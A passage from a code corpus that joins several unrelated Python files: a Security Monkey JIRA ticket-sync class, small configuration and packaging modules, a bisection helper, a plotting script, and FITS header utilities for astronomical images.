            raise Exception('Error opening JIRA sync configuration file: {}'.format(e))
        except yaml.scanner.ScannerError as e:
            raise Exception('JIRA sync configuration file contains malformed YAML: {}'.format(e))

        try:
            options = {}
            options['verify'] = app.config.get('JIRA_SSL_VERIFY', True)
            proxies = None
            # Both proxy host and port must be set for the proxy to be used.
            if self.ip_proxy and self.port_proxy:
                proxy_connect = '{}:{}'.format(self.ip_proxy, self.port_proxy)
                proxies = {'http': proxy_connect, 'https': proxy_connect}
            elif self.ip_proxy and self.port_proxy is None:
                # logger.warn is deprecated (removed in Python 3.13); use warning.
                app.logger.warning("Proxy host set, but not proxy port. Skipping JIRA proxy settings.")
            elif self.ip_proxy is None and self.port_proxy:
                app.logger.warning("Proxy port set, but not proxy host. Skipping JIRA proxy settings.")

            self.client = JIRA(self.server, basic_auth=(self.account, self.password), options=options, proxies=proxies)  # pylint: disable=E1123
        except Exception as e:
            raise Exception("Error connecting to JIRA: {}".format(str(e)[:1024]))

    def close_issue(self, issue):
        """Transition *issue* to the configured closed state, logging failures."""
        try:
            self.transition_issue(issue, app.config.get('JIRA_CLOSED', 'Closed'))
        except Exception as e:
            app.logger.error('Error closing issue {} ({}): {}'.format(issue.fields.summary, issue.key, e))

    def open_issue(self, issue):
        """Transition *issue* to the configured open state, logging failures."""
        try:
            self.transition_issue(issue, app.config.get('JIRA_OPEN', 'Open'))
        except Exception as e:
            app.logger.error('Error opening issue {} ({}): {}'.format(issue.fields.summary, issue.key, e))

    def transition_issue(self, issue, transition_name):
        """Apply the named workflow transition to *issue* (case-insensitive match)."""
        transitions = self.client.transitions(issue)
        for transition in transitions:
            if transition['name'].lower() == transition_name.lower():
                break
        else:
            app.logger.error('No transition {} for issue {}'.format(transition_name, issue.key))
            return
        self.client.transition_issue(issue, transition['id'])

    def add_or_update_issue(self, issue, technology, account, count):
        """ Searches for existing tickets based on the summary. If one exists,
        it will update the count and preserve any leading description text. If not, it will create a ticket. """
        summary = '{0} - {1} - {2}'.format(issue, technology, account)
        # Having dashes in JQL causes it to return no results
        summary_search = summary.replace('- ', '')
        jql = 'project={0} and summary~"{1}"'.format(self.project, summary_search)
        issues = self.client.search_issues(jql)

        url = "{0}/#/issues/-/{1}/{2}/-/-/-/True/{3}/1/25".format(self.url, technology, account, urllib.parse.quote(issue, ''))
        timezone = time.tzname[time.localtime().tm_isdst]
        description = ("This ticket was automatically created by Security Monkey. DO NOT EDIT SUMMARY OR BELOW THIS LINE\n"
                       "Number of issues: {0}\n"
                       "Account: {1}\n"
                       "[View on Security Monkey|{2}]\n"
                       "Last updated: {3} {4}".format(count, account, url, datetime.datetime.now().isoformat(), timezone))

        # Renamed the loop variable from ``issue``, which shadowed the
        # issue-text parameter above.
        for existing in issues:
            # Make sure we found the exact ticket
            if existing.fields.summary != summary:
                continue

            # Preserve any free-form text the user added above our marker.
            old_desc = existing.fields.description
            old_desc = old_desc[:old_desc.find('This ticket was automatically created by Security Monkey')]
            if self.only_update_on_change and existing.fields.description:
                # Raw string: the pattern was previously a non-raw string with
                # an invalid "\d" escape.
                old_count = re.search(r"Number of issues: (\d*)\n", existing.fields.description).group(1)
                if int(old_count) != count:
                    # The count has changed so it still needs to be updated
                    existing.update(description=old_desc + description)
                    app.logger.debug("Updated issue {} ({})".format(summary, existing.key))
                else:
                    # The count hasn't changed so it will not be updated
                    app.logger.debug('Not updating issue, configured to only update if the count has changed.')
            else:
                existing.update(description=old_desc + description)
                app.logger.debug("Updated issue {} ({})".format(summary, existing.key))

            if self.disable_transitions:
                return

            # Reopen closed tickets that regressed; close tickets that are fixed.
            if existing.fields.status.name == app.config.get('JIRA_CLOSED', 'Closed') and count:
                self.open_issue(existing)
                app.logger.debug("Reopened issue {} ({})".format(summary, existing.key))
            elif existing.fields.status.name != app.config.get('JIRA_CLOSED', 'Closed') and count == 0:
                self.close_issue(existing)
                app.logger.debug("Closed issue {} ({})".format(summary, existing.key))
            return

        # Don't open a ticket with no issues
        if count == 0:
            return

        jira_args = {'project': {'key': self.project},
                     'issuetype': {'name': self.issue_type},
                     'summary': summary,
                     'description': description}
        if self.assignee is not None:
            jira_args['assignee'] = {'name': self.assignee}
        try:
            new_issue = self.client.create_issue(**jira_args)
            app.logger.debug("Created issue {} ({})".format(summary, new_issue.key))
        except Exception as e:
            app.logger.error("Error creating issue {}: {}".format(summary, e))

    def sync_issues(self, accounts=None, tech_name=None):
        """ Runs add_or_update_issue for every AuditorSetting, filtered by technology
        and accounts, if provided. """
        query = AuditorSettings.query.join(
            (Technology, Technology.id == AuditorSettings.tech_id)
        ).join(
            (Account, Account.id == AuditorSettings.account_id)
        ).filter(
            # SQLAlchemy column expression: must stay ``== False`` (not ``is False``).
            (AuditorSettings.disabled == False)  # noqa: E712
        )

        if accounts:
            query = query.filter(Account.name.in_(accounts))

        if tech_name:
            query = query.filter(Technology.name == tech_name)

        for auditorsetting in query.all():
            unjustified = [issue for issue in auditorsetting.issues if not issue.justified]
            self.add_or_update_issue(auditorsetting.issue_text,
                                     auditorsetting.technology.name,
                                     auditorsetting.account.name,
                                     len(unjustified))
| StarcoderdataPython |
5053407 | <gh_stars>0
from pydantic import BaseSettings
class Settings(BaseSettings):
    """Application settings populated by pydantic from the environment."""

    app_name: str = "default"
    admin_email: str   # required: no default, must come from the environment
    token: str         # required
    database_url: str  # required

    class Config:
        # Heroku sets IS_HEROKU; locally it is absent, so fall back to a
        # .env file for the required fields above.
        import os
        is_prod = os.environ.get('IS_HEROKU', None)
        if is_prod is None:
            # NOTE(review): env_file is only defined in the non-Heroku case;
            # presumably pydantic tolerates the attribute being absent in
            # production — confirm against the pydantic version in use.
            env_file = ".env"
5044771 | <reponame>hroncok/rst2txt<gh_stars>1-10
# -*- coding: utf-8 -*-
from setuptools import setup
# Package metadata lives in setup.cfg; this file only wires up the console
# entry point and derives the version from the SCM tag (setuptools_scm).
setup(
    entry_points={
        'console_scripts': [
            'rst2txt = rst2txt:main',  # `rst2txt` CLI dispatches to rst2txt.main
        ],
    },
    use_scm_version=True,
)
| StarcoderdataPython |
1751472 | import gws
import gws.types as t
class ElementConfig(gws.WithAccess):
    """GWS client UI element configuration"""

    tag: str  #: element tag
    before: str = ''  #: insert before this tag
    after: str = ''  #: insert after this tag
class Config(gws.WithAccess):
    """GWS client configuration"""

    options: t.Optional[dict]  #: client options
    elements: t.Optional[t.List[ElementConfig]]  #: client UI elements
    addElements: t.Optional[t.List[ElementConfig]]  #: add elements to the parent element list
    removeElements: t.Optional[t.List[ElementConfig]]  #: remove elements from the parent element list
class ElementProps(gws.Data):
    # Serialized form of a single UI element sent to the client.
    tag: str
class Props(gws.Data):
    # Serialized client configuration (options + element list) sent to the client.
    options: t.Optional[dict]
    elements: t.Optional[t.List[ElementProps]]
class Element(gws.Node):
    # A single configured client UI element; exposes only its tag to the client.
    def props_for(self, user):
        return ElementProps(tag=self.var('tag'))
class Object(gws.Node, gws.IClient):
    """Client configuration node: merges its own options/elements with the parent client's."""

    options: dict
    elements: t.List[Element]

    def props_for(self, user):
        return Props(options=self.options, elements=self.elements)

    def configure(self):
        parent_client = self.var('parentClient')
        # Build child Element nodes from the (possibly inherited) element configs.
        self.elements = self.create_children(Element, self._get_elements(parent_client))
        opts = self.var('options')
        # Fall back to the parent client's options when none are set locally.
        if not opts and parent_client:
            opts = gws.get(parent_client, 'options', {})
        self.options = opts or {}

    def _get_elements(self, parent_client):
        # Explicit local `elements` wins outright over any inheritance.
        elements = self.var('elements')
        if elements:
            return elements
        if not parent_client:
            return []

        # Start from a copy of the parent's elements, then apply add/remove.
        elements = list(gws.get(parent_client, 'elements', []))

        add = self.var('addElements', default=[])
        for c in add:
            # Re-adding an existing tag replaces it (remove, then re-insert).
            n = _find_element(elements, c.tag)
            if n >= 0:
                elements.pop(n)
            if c.before:
                n = _find_element(elements, c.before)
                if n >= 0:
                    elements.insert(n, c)
            elif c.after:
                n = _find_element(elements, c.after)
                if n >= 0:
                    elements.insert(n + 1, c)
            else:
                # No anchor given: append at the end.
                elements.append(c)
            # NOTE(review): when `before`/`after` names a tag that is absent,
            # the element is silently dropped — confirm this is intentional.

        remove = self.var('removeElements', default=[])
        remove_tags = [c.tag for c in remove]

        return [e for e in elements if e.tag not in remove_tags]
def _find_element(elements, tag):
for n, el in enumerate(elements):
if el.tag == tag:
return n
return -1
| StarcoderdataPython |
1721179 | <gh_stars>100-1000
from ..utils.registry import Registry
DATASET_REGISTRY = Registry("dataset")
def build_dataset(cfg):
    """
    Build the dataset described by cfg.

    Args:
        cfg (dict): dataset configuration; its "name" key selects a class
            registered in DATASET_REGISTRY, and the whole dict is passed to
            that class's constructor.

    Returns:
        The built dataset instance.
    """
    dataset_cls = DATASET_REGISTRY.get(cfg.get("name"))
    return dataset_cls(cfg)
def list_datasets(name=None):
    """
    List the names of all registered datasets.

    Args:
        name: (TODO) list only the datasets corresponding to a given name.
    """
    return [key for key in DATASET_REGISTRY._obj_map.keys()]
1603704 | """Bisection algorithms."""
def insort(a, x, lo=0, hi=None):
    """Insert item x in list a, and keep it sorted assuming a is sorted.

    x is inserted to the right of any equal entries (same as bisect_right).
    """
    if hi is None:
        hi = len(a)
    while lo < hi:
        # Floor division: `/` produced a float on Python 3, which raised
        # TypeError when used as a list index.
        mid = (lo + hi) // 2
        if x < a[mid]:
            hi = mid
        else:
            lo = mid + 1
    a.insert(lo, x)
def bisect(a, x, lo=0, hi=None):
    """Find the index where to insert item x in list a, assuming a is sorted.

    Returns the rightmost insertion point (same as bisect_right).
    """
    if hi is None:
        hi = len(a)
    while lo < hi:
        # Floor division: `/` produced a float on Python 3, which raised
        # TypeError when used as a list index.
        mid = (lo + hi) // 2
        if x < a[mid]:
            hi = mid
        else:
            lo = mid + 1
    return lo
| StarcoderdataPython |
6656360 | <filename>src/make_video.py
# run as: python make_video.py
import numpy as np
import os
import matplotlib.pyplot as plt
# Which model/fiber pair to load; file names below are derived from these.
fiber = 0
model = 0

# Load the extracellular potential trace; the file stores -Ve, so flip sign.
ve_path = os.path.join('..', 've_files', f'model{model}_fiber{fiber}.dat')
print(f've_path: {ve_path}')
ve = -1 * np.loadtxt(ve_path, skiprows=1)

# Longitudinal coordinates for the same fiber (last column of the file).
coords_path = os.path.join('..', 'coords_files', f'{fiber}.dat')
coords = np.loadtxt(coords_path, skiprows=1)[:, -1]

# Single figure: potential vs. coordinate. (A duplicated plt.subplots() call
# was removed; it leaked an unused empty figure.)
fig, ax = plt.subplots()
ax.plot(coords, ve, 'k-')
plt.show()

print('DONE')
4898596 | from __future__ import print_function
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 10 13:18:46 2015
@author: nadiablago
"""
from matplotlib import pylab as plt
import glob
from astropy.io import fits as pf
import os, sys
from optparse import OptionParser
import matplotlib
import numpy as np
from astropy.wcs import WCS
from utils import zscale
from utils import time_utils
if __name__ == '__main__':
    # Plot every FITS frame matching --pattern under --dir as a PNG in
    # <dir>/png, marking the target (--ra/--dec) with a red cross.
    parser = OptionParser()

    parser.add_option("-d", "--dir", action="store", type="string", dest="dir", metavar="Directory to be plotted", default=".")
    parser.add_option("-a", "--ra", action="store", type="float", dest="ra", metavar="ra", default=0.0)
    parser.add_option("-b", "--dec", action="store", type="float", dest="dec", metavar="dec", default=0.0)
    parser.add_option("-p", "--pattern", action="store", type="string", dest="pattern", metavar="pattern", default="*.fits")

    (options, args) = parser.parse_args()

    # Every option has a default, so None here means a parse problem: bail out.
    if (None in options.__dict__.values()):
        parser.print_help()
        sys.exit(0)

    mydir = options.__dict__['dir']
    plot_dir = os.path.join(mydir, "png")
    ra = options.__dict__['ra']
    dec = options.__dict__['dec']
    pattern = options.__dict__['pattern']

    print (ra, dec)

    if (not os.path.isdir(plot_dir)):
        os.makedirs(plot_dir)

    for f in glob.glob(mydir + "/" + pattern):
        print ("Plotting",os.path.basename(f).replace(".fits", ".png"))
        hdulist = pf.open(f)
        # Multi-extension FITS: plot each extension; otherwise just the primary HDU.
        if len(hdulist)>1:
            indices = np.arange(len(hdulist)-1)+1
        else:
            indices = np.array([0])
        for i in indices:
            prihdr = hdulist[i].header
            img = hdulist[i].data * 1.  # multiply to force a float copy
            nx, ny = img.shape
            if (ra * dec != 0):
                # Get pixel coordinates of SN
                wcs = WCS(prihdr)
                try:
                    target_pix = wcs.wcs_sky2pix([(np.array([ra,dec], np.float_))], 1)[0]
                except:
                    # NOTE(review): bare except also swallows KeyboardInterrupt.
                    print ("ERROR when converting sky to wcs. Is astrometry in place? Default coordinates assigned.")
                    target_pix = [+nx/2., ny/2.]
                print (target_pix)
            else:
                # No target supplied: mark the frame centre instead.
                target_pix = [+nx/2., ny/2.]
            img = img - np.nanmin(img)  # shift so the minimum pixel is zero before log10
            av = np.median(img.flatten())
            # NOTE(review): zscale limits are computed but unused; vmin/vmax
            # below use the median instead — confirm which was intended.
            mi, ma = zscale.zscale(img)
            im = plt.imshow(plt.log10(img), aspect="equal", extent=(0, ny, 0, nx), \
                origin="lower", cmap=matplotlib.cm.gray_r, interpolation="none", vmin=np.log10(av), vmax=np.log10(3*av)) #, interpolation="lanczos")
            plt.scatter(target_pix[0], target_pix[1], marker="x", s=10, c="red")
            plt.colorbar(im)
            filename = os.path.basename(f)
            # One PNG per extension: replace the extension with "_<i>.png".
            plt.savefig(os.path.join(plot_dir, filename.replace("."+filename.split(".")[-1], "_{:}.png".format(i))), dpi=200)
            plt.clf()
def move_to_discarded(mydir, myfilter, ra, dec):
    """Sort FITS files by whether they contain the target at (ra, dec).

    Files with no frame containing the target are moved to <mydir>/discarded;
    files that do contain it have the matching extensions extracted alongside
    the original (via extract_field_from_moscaic).
    """
    import shutil

    for f in glob.glob(os.path.join(mydir, myfilter)):
        frames_with_target = get_frames_with_target(f, ra, dec)
        # get_frames_with_target returns a numpy array; .size is the explicit
        # emptiness test (plain truthiness is ambiguous for arrays).
        if frames_with_target.size == 0:
            discarddir = os.path.join(mydir, "discarded")
            if not os.path.isdir(discarddir):
                print("Creating directory for discarded files (with no target)")
                os.makedirs(discarddir)
            print("Moving file ", f, " to discarded directory", discarddir)
            shutil.move(f, os.path.join(discarddir, os.path.basename(f)))
        else:
            print("Object found in frames", frames_with_target, " in file ", f)
            print("Extracting this field")
            extract_field_from_moscaic(mydir, os.path.basename(f), frames_with_target, origname=True)
def get_frames_with_target(myfile, ra, dec, debug=False):
    """Return the HDU indices of *myfile* whose image contains (ra, dec).

    When ra*dec == 0 the frame centre is used as the target, so every frame
    matches. Returns a numpy array of indices (possibly empty).
    """
    hdulist = pf.open(myfile)
    # Multi-extension FITS: check each extension; otherwise just the primary HDU.
    if len(hdulist) > 1:
        indices = np.arange(len(hdulist) - 1) + 1
    else:
        indices = np.array([0])

    frames = []
    for i in indices:
        prihdr = hdulist[i].header
        img = hdulist[i].data * 1.  # multiply to force a float copy
        ny, nx = img.shape
        if ra * dec != 0:
            # Get pixel coordinates of the target from the frame's WCS.
            wcs = WCS(prihdr)
            try:
                # np.float_ was removed in NumPy 2.0; plain float is equivalent.
                target_pix = wcs.wcs_sky2pix([(np.array([ra, dec], float))], 1)[0]
            except Exception:
                print("ERROR when converting sky to wcs. Is astrometry in place? Default coordinates assigned.")
                target_pix = [+nx / 2., ny / 2.]
            if debug:
                print(i, target_pix)
        else:
            # No target supplied: use the frame centre (always inside the frame).
            target_pix = [+nx / 2., ny / 2.]

        if (target_pix[0] > 0 and target_pix[0] < nx) and (target_pix[1] > 0 and target_pix[1] < ny):
            frames.append(i)

    return np.array(frames)
def cut_frame_with_target(myfile, ra, dec, h=4000, w=2000, debug=False):
    """Cut a h x w pixel region around (ra, dec) out of the primary HDU.

    The cutout is written to out.fits next to *myfile*. When ra*dec == 0 the
    frame centre is used as the target. Nothing is written if the target falls
    outside the frame.
    """
    hdulist = pf.open(myfile)[0]
    img = hdulist.data * 1.  # multiply to force a float copy
    img = img.T
    nx, ny = img.shape
    if ra * dec != 0:
        # Get pixel coordinates of the target from the frame's WCS.
        wcs = WCS(hdulist.header)
        try:
            # np.float_ was removed in NumPy 2.0; plain float is equivalent.
            target_pix = wcs.wcs_sky2pix([(np.array([ra, dec], float))], 1)[0]
        except Exception:
            print("ERROR when converting sky to wcs. Is astrometry in place? Default coordinates assigned.")
            target_pix = [+nx / 2., ny / 2.]
        if debug:
            # Was `print(i, target_pix)`: `i` is undefined in this function and
            # raised a NameError whenever debug=True.
            print(target_pix)
    else:
        target_pix = [+nx / 2., ny / 2.]

    # If contained in the frame, clamp the cut region to the image bounds.
    if (target_pix[0] > 0 and target_pix[0] < nx) and (target_pix[1] > 0 and target_pix[1] < ny):
        # Cast to int: float slice bounds raise TypeError on modern numpy.
        xmin = int(np.maximum(0, target_pix[0] - w / 2.))
        xmax = int(np.minimum(nx, target_pix[0] + w / 2.))
        ymin = int(np.maximum(0, target_pix[1] - h / 2.))
        ymax = int(np.minimum(ny, target_pix[1] + h / 2.))
        print("Target", target_pix, xmin, xmax, ymin, ymax)

        newhdu = pf.PrimaryHDU()
        newhdu.header = hdulist.header
        newhdu.data = hdulist.data[ymin:ymax, xmin:xmax]
        newname = os.path.join(os.path.dirname(myfile), "out.fits")
        # NOTE(review): overwrite=False makes a second call fail because the
        # output name is fixed — confirm whether that is intentional.
        newhdu.writeto(newname, output_verify="fix", overwrite=False)
        print("Extracted region around target and stored to ", newname)
    else:
        print("Target not in the frame!")
def extract_field_from_moscaic(mydir, myfilter, nfields=None, origname=False):
    """Extract selected extensions from each mosaic FITS file into new files.

    For every file matching *myfilter* under *mydir*, each extension listed in
    *nfields* (all of them when None) is written out as a standalone FITS file
    named either <orig>_<n>.fits (origname=True) or out<i>_<n>.fits.
    """
    if np.isscalar(nfields):
        nfields = np.array([nfields])
    for i, f in enumerate(glob.glob(os.path.join(mydir, myfilter))):
        hdulist = pf.open(f)
        # `is None`, not `== None`: comparing a numpy array with == is
        # elementwise and its truth value is ambiguous for >1 element.
        if nfields is None:
            nfields = np.arange(len(hdulist) - 1) + 1
        for n in nfields:
            hdu = hdulist[n]
            # Merge the primary header into the extension header so the
            # extracted file is self-contained.
            hdu.header = hdulist[0].header + hdulist[n].header
            hduheader = pf.PrimaryHDU()
            hduheader.header = hdu.header
            hduheader.data = hdu.data
            hdulist1 = pf.HDUList([hduheader, hdu])
            if origname:
                name = os.path.basename(f)
                name = name.replace(".fits", "_%d.fits")
                hdulist1.writeto(name % (n), output_verify="fix", overwrite=True)
            else:
                hdulist1.writeto("out%d_%d.fits" % (i, n), output_verify="fix", overwrite=True)
def unify_header(prihdr):
    '''
    Reads the different fields from different telescopes and unifies them under
    common names (GAIN, RDNOISE, AIRMASS, EXPTIME, FILTER, MJD-OBS, PIXSCALE,
    plus FILTER2/GRISM/SLIT for some spectrographs).

    Unified values are only written into `prihdr` when the keyword is not
    already present. Returns the (possibly updated) header, or None when the
    telescope cannot be identified.
    '''
    # Defaults for the unified keywords (fix: "AIRMASS" was listed twice in the
    # original dict literal).
    dic = {"GAIN": 0, "RDNOISE": 0, "AIRMASS": 0, "EXPTIME": 0, "FILTER": 0, "MJD-OBS": 0}
    # Map SDSS-style filter names to their single-letter short forms.
    filters = {"SDSS-G": "g", "SDSS-R": "r", "SDSS-I": "i", "SDSS-Z": "z"}
    try:
        telescope = prihdr["TELESCOP"]
        print ("telescope: %s detected!" % telescope)
    except KeyError:
        try:
            # PS1-style headers store the telescope under a HIERARCH keyword.
            telescope = prihdr["HIERARCH FPA.TELESCOPE"]
        except Exception:  # narrowed from a bare `except:`
            print ("Could not locate the telescope field")
            return
    # Compute the pixel size from the WCS by projecting two adjacent pixels.
    wcs = WCS(prihdr)
    world0 = wcs.wcs_pix2world([[0, 0]], 1)
    world1 = wcs.wcs_pix2world([[1, 1]], 1)
    pixsize = (world1 - world0)[0][1] * 3600  # arcsec / pix
    dic["PIXSCALE"] = pixsize
    # Per-telescope (and per-instrument) keyword mappings.
    if telescope == "NOT":
        dic["EXPTIME"] = prihdr["EXPTIME"]
        dic["AIRMASS"] = prihdr["AIRMASS"]
        dic["MJD-OBS"] = time_utils.utc2mjd(prihdr["DATE-OBS"])
        if prihdr["INSTRUME"] == "StanCam":
            dic["FILTER"] = prihdr["STFLTNM"][0]
            dic["GAIN"] = prihdr["GAIN"]
            dic["RDNOISE"] = prihdr["RDNOISE"]
        elif prihdr["INSTRUME"] == "NOTCAM":
            dic["GAIN"] = prihdr["GAIN1"]
            dic["RDNOISE"] = prihdr["RDNOISE1"]
            dic["FILTER"] = prihdr["NCFLTNM2"]
    elif telescope == "UKIRT":
        dic["GAIN"] = prihdr["GAIN"]
        dic["RDNOISE"] = prihdr["READNOIS"]
        dic["EXPTIME"] = prihdr["EXP_TIME"]
        dic["AIRMASS"] = prihdr["AMSTART"]
        dic["FILTER"] = prihdr["FILTER"]
        dic["MJD-OBS"] = prihdr["MJD-OBS"]
    elif telescope == "PS1":
        dic["GAIN"] = prihdr["HIERARCH CELL.GAIN"]
        dic["RDNOISE"] = prihdr["HIERARCH CELL.READNOISE"]
        dic["EXPTIME"] = prihdr["EXPTIME"]
        dic["AIRMASS"] = prihdr["AIRMASS"]
        dic["FILTER"] = prihdr["HIERARCH FPA.FILTERID"]
        dic["MJD-OBS"] = prihdr["MJD-OBS"]
    elif telescope == "INT":
        dic["GAIN"] = prihdr["GAIN"]
        if ("RDNOISE" in prihdr.keys()):
            dic["RDNOISE"] = prihdr["RDNOISE"]
        else:
            dic["RDNOISE"] = prihdr["READNOIS"]
        dic["EXPTIME"] = prihdr["EXPTIME"]
        dic["AIRMASS"] = prihdr["AIRMASS"]
        dic["FILTER"] = prihdr["WFFBAND"]
        dic["MJD-OBS"] = prihdr["MJD-OBS"]
    elif telescope == "WHT":
        if prihdr["INSTRUME"] == "ACAM":
            dic["GAIN"] = prihdr["GAIN"]
            dic["RDNOISE"] = prihdr["READNOIS"]
            dic["EXPTIME"] = prihdr["EXPTIME"]
            dic["AIRMASS"] = prihdr["AIRMASS"]
            dic["FILTER"] = prihdr["ACAMFILT"]
            dic["MJD-OBS"] = prihdr["MJD-OBS"]
        # Deliberately a second `if` (not elif) as in the original: an
        # instrument name containing "ISIS" takes this branch.
        if "ISIS" in prihdr["INSTRUME"]:
            dic["GAIN"] = prihdr["GAIN"]
            dic["RDNOISE"] = prihdr["READNOIS"]
            dic["EXPTIME"] = prihdr["EXPTIME"]
            dic["AIRMASS"] = prihdr["AIRMASS"]
            dic["FILTER"] = prihdr["ISIFILTA"].replace(".", "")
            dic["FILTER2"] = prihdr["ISIFILTB"].replace(".", "")
            dic["MJD-OBS"] = prihdr["MJD-OBS"]
            dic["GRISM"] = prihdr["ISIGRAT"]
            dic["SLIT"] = prihdr["ISISLITW"]
    elif telescope == "CFHT 3.6m":
        dic["GAIN"] = prihdr["GAIN"]
        dic["RDNOISE"] = prihdr["RDNOISE"]
        dic["EXPTIME"] = prihdr["EXPTIME"]
        dic["AIRMASS"] = prihdr["AIRMASS"]
        dic["FILTER"] = prihdr["FILTER"]
        dic["MJD-OBS"] = prihdr["MJD-OBS"]
    elif telescope == "Liverpool Telescope":
        dic["GAIN"] = prihdr["GAIN"]
        dic["RDNOISE"] = prihdr["READNOIS"]
        dic["EXPTIME"] = prihdr["EXPTIME"]
        dic["AIRMASS"] = prihdr["AIRMASS"]
        dic["FILTER"] = filters.get(prihdr["FILTER1"], prihdr["FILTER1"])
        dic["MJD-OBS"] = prihdr["MJD"]
    elif telescope == "GTC":
        if (prihdr["INSTRUME"] == "OSIRIS"):
            dic["GAIN"] = prihdr["GAIN"]
            dic["EXPTIME"] = prihdr["EXPTIME"]
            dic["AIRMASS"] = prihdr["AIRMASS"]
            dic["FILTER"] = filters.get(prihdr["FILTER1"], prihdr["FILTER1"])
            dic["MJD-OBS"] = prihdr["MJD-OBS"]
            dic["GRISM"] = prihdr["GRISM"]
            dic["SLIT"] = prihdr["SLITW"]
            speed = prihdr["RSPEED"]
            # Readout-noise values from
            # http://www.gtc.iac.es/instruments/osiris/osiris.php
            if (speed == 200):
                dic["RDNOISE"] = 4.5
            elif (speed == 100):
                dic["RDNOISE"] = 3.5
            else:
                dic["RDNOISE"] = 9
    elif telescope == "Palomar 200":
        if (prihdr["INSTRUME"] == "WIRC"):
            dic["GAIN"] = prihdr["GAIN"]
            dic["EXPTIME"] = prihdr["EXPTIME"]
            dic["AIRMASS"] = prihdr["AIRMASS"]
            dic["FILTER"] = prihdr["FILTER"]
            dic["MJD-OBS"] = prihdr["MJD"]
            dic["RDNOISE"] = prihdr["EFFRN"]
    elif telescope == "Keck II":
        if (prihdr["CURRINST"] == "NIRC2"):
            dic["GAIN"] = prihdr["GAIN"]
            # Effective exposure time: per-coadd integration times the coadds.
            dic["EXPTIME"] = prihdr["ITIME"] * prihdr["COADDS"]
            dic["AIRMASS"] = prihdr["AIRMASS"]
            dic["FILTER"] = prihdr["FILTER"]
            dic["MJD-OBS"] = prihdr["MJD-OBS"]
            dic["RDNOISE"] = prihdr["RDNOISE"]
    elif telescope == "1m0-09":
        dic["GAIN"] = prihdr["GAIN"]
        dic["EXPTIME"] = prihdr["EXPTIME"]
        dic["AIRMASS"] = prihdr["AIRMASS"]
        dic["FILTER"] = prihdr["FILTER"]
        dic["MJD-OBS"] = prihdr["MJD-OBS"]
        dic["RDNOISE"] = prihdr["RDNOISE"]
    else:
        print ("Telescope unknown!")
    # Copy the unified values in without clobbering pre-existing keywords.
    for k in dic.keys():
        if k not in prihdr.keys():
            prihdr[k] = dic[k]
    return prihdr
def unify_fits(myfits, overwrite=False, field=-1):
    '''
    Creates a unified standard version of the fits file header, creating
    standard fields for the most used keywords (via unify_header).

    myfits: path to the FITS file.
    overwrite: when True, the unified file replaces the input in place;
        otherwise a new file named "<object>_<instrument>[_grism][_slit]_<filter>_<n>.fits"
        is written, with n incremented until the name is free.
    field: extension whose data to keep when the file has several extensions.
        Must be given explicitly when more than one extension carries data.
    '''
    hdulist = pf.open(myfits)
    print (hdulist.info())
    nfields = len(hdulist)
    # Count how many extensions actually carry image data.
    datafields = 0
    for n in range(nfields):
        if (hdulist[n].data is not None):
            datafields += 1
    if nfields > 1:
        if (field == -1 and datafields > 1):
            # Fix: corrected the "Plsease" typo in the user-facing warning.
            print ("WARNING, there are several images stored. Please, specify which number you want to extract.")
            print ("Exiting...")
            return
        # Merge every extension header into the primary one.
        # (Renamed from the original reuse of `nfields` for clarity.)
        ext_ids = np.arange(len(hdulist) - 1) + 1
        hdu = hdulist[0]
        for n in ext_ids:
            hdu.header = hdu.header + hdulist[n].header
        hdu.data = hdulist[field].data
    else:
        hdu = hdulist[0]
    new_header = unify_header(hdu.header)
    primhdu = pf.PrimaryHDU(header=new_header, data=hdu.data)
    hdulist = pf.HDUList([primhdu])
    if (overwrite):
        hdulist.writeto(myfits, overwrite=True)
    else:
        obj = hdulist[0].header["OBJECT"].replace(" ", "")
        filt = hdulist[0].header["FILTER"]
        inst = hdulist[0].header["INSTRUME"].replace(" ", "")
        try:
            slit = "_%.1f" % hdulist[0].header["SLIT"]
            grism = "_" + hdulist[0].header["GRISM"].replace(".", "")
        except Exception:  # narrowed from a bare `except:`; imaging data has no slit/grism
            slit = ""
            grism = ""
        name = "%s_%s%s%s_%s_1.fits" % (obj, inst, grism, slit, filt)
        # Bump the trailing sequence number until the file name is unused.
        while os.path.isfile(name):
            seq = int(name.split("_")[-1].replace(".fits", ""))
            name = name.replace("_%d.fits" % seq, "_%d.fits" % (seq + 1))
        hdulist.writeto(name, overwrite=False)
def get_par(myfits, par, ext=0):
    '''
    Returns the value of header keyword `par` (upper-cased) from extension
    `ext` of the FITS file, or None if the keyword or the file is missing.
    '''
    hdu = None
    try:
        hdu = pf.open(myfits, ignore_missing_end=True)
        header = hdu[ext].header
        key = str.upper(par)
        if key in header.keys():
            return header[key]
        return None
    except IOError:
        return None
    finally:
        # Fix: the file handle was never closed before.
        if hdu is not None:
            hdu.close()
def update_par(myfits, par, value, ext=0):
    '''
    Updates the FITS file in place, setting header keyword `par` to `value`
    in extension `ext`.
    '''
    hdu = pf.open(myfits, ignore_missing_end=True)
    try:
        header = hdu[ext].header
        header.set(par, value)
        hdu.writeto(myfits, overwrite=True)
    finally:
        hdu.close()  # fix: the file handle was never closed before
def update_pars(myfits, pardic, ext=0):
    '''
    Updates the FITS file in place, setting every key/value pair of `pardic`
    in the header of extension `ext`.
    '''
    hdu = pf.open(myfits, ignore_missing_end=True)
    try:
        header = hdu[ext].header
        # Fix: `pardic.iteritems()` is Python-2-only and raises AttributeError
        # under Python 3; `items()` works in both.
        for key, value in pardic.items():
            header.set(key, value)
        hdu.writeto(myfits, overwrite=True)
    finally:
        hdu.close()  # fix: the file handle was never closed before
def has_par(myfits, par, ext=0):
    '''
    Returns True when header keyword `par` exists in extension `ext` of the
    FITS file. (Fix: the docstring previously described update_par.)
    '''
    hdu = pf.open(myfits, ignore_missing_end=True)
    try:
        header = hdu[ext].header
        return par in header.keys()
    finally:
        hdu.close()  # fix: the file handle was never closed before
def arrange_fits_in_directories(mydir, myfilter, destdir):
    '''
    Automatically sorts FITS files into a directory structure with the
    instrument name as the first level, the filter name as the second level,
    and the integer MJD of the observation as the third level.

    mydir: where the files to be sorted are.
    myfilter: glob pattern used to find them.
    destdir: main level directory the files should be moved to.
    '''
    import shutil
    for f in glob.glob(os.path.join(mydir, myfilter)):
        header = pf.open(f)[0].header
        filt = header["FILTER"]
        # Truncate MJD to its integer part: one directory per observing night.
        mjd = int(header["MJD-OBS"])
        instrument = header["INSTRUME"]
        # Destination layout: <destdir>/<instrument>/<filter>/<mjd>/
        destination = os.path.join(destdir, "%s/%s/%d"%(instrument,filt, mjd))
        if (not os.path.isdir(destination) ):
            os.makedirs(destination)
